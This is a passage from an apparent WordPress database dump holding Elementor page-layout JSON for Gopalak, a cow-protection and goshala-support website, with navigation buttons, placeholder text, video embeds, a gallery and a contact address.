us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10019,1677,'_elementor_page_assets','a:0:{}'),(10021,1678,'_elementor_edit_mode','builder'),(10022,1678,'_elementor_template_type','wp-page'),(10023,1678,'_elementor_version','3.7.8'),(10024,1678,'_wp_page_template','elementor_canvas'),(10025,1678,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 